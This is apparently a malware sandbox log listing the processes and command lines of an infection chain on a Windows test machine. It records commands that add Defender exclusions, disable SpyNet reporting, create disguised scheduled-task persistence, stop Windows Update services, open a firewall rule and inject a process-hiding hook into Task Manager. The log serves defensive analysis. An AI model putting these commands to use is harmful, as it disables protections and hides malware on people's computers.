PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 2756 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe
PID 2756 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe
PID 2756 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe
PID 2756 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe

"C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\EC81.exe

C:\Users\Admin\AppData\Local\Temp\EC81.exe

C:\Users\Admin\AppData\Local\Temp\ED7B.exe

C:\Users\Admin\AppData\Local\Temp\ED7B.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EED4.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

C:\Users\Admin\AppData\Local\Temp\F00D.exe

C:\Users\Admin\AppData\Local\Temp\F00D.exe

C:\Users\Admin\AppData\Local\Temp\F136.exe

C:\Users\Admin\AppData\Local\Temp\F136.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

C:\Users\Admin\AppData\Local\Temp\F2DC.exe

C:\Users\Admin\AppData\Local\Temp\F2DC.exe

C:\Users\Admin\AppData\Local\Temp\FEBF.exe

C:\Users\Admin\AppData\Local\Temp\FEBF.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

C:\Users\Admin\AppData\Local\Temp\458F.exe

C:\Users\Admin\AppData\Local\Temp\458F.exe

C:\Users\Admin\AppData\Local\Temp\483F.exe

C:\Users\Admin\AppData\Local\Temp\483F.exe

C:\Users\Admin\AppData\Local\Temp\4A62.exe

C:\Users\Admin\AppData\Local\Temp\4A62.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\5932.exe

C:\Users\Admin\AppData\Local\Temp\5932.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=4A62.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0

C:\Windows\system32\taskeng.exe

taskeng.exe {145A503E-3F30-46DD-B868-395E7AFEB9B4} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe

.\Install.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2572 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 256

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gDwEUxeEG" /SC once /ST 03:01:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gDwEUxeEG"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\C29F.exe

C:\Users\Admin\AppData\Local\Temp\C29F.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {466328DC-34B7-4775-A8F3-4755863DD1C3} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gDwEUxeEG"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 06:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\OhvJeSu.exe\" 3Y /DEsite_idGOt 385119 /S" /V1 /F

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231026063745.log C:\Windows\Logs\CBS\CbsPersist_20231026063745.cab

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\OhvJeSu.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\OhvJeSu.exe 3Y /DEsite_idGOt 385119 /S

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gPkGGKDmy" /SC once /ST 03:59:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gPkGGKDmy"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gPkGGKDmy"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\wUBDPVxDQVpvNZiy\mmlUJVfV\cMhuwqGgykdXRrvz.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\wUBDPVxDQVpvNZiy\mmlUJVfV\cMhuwqGgykdXRrvz.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2014310879-82257179-1883772646-11490025932025401429-1824233437-18252139921068948178"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

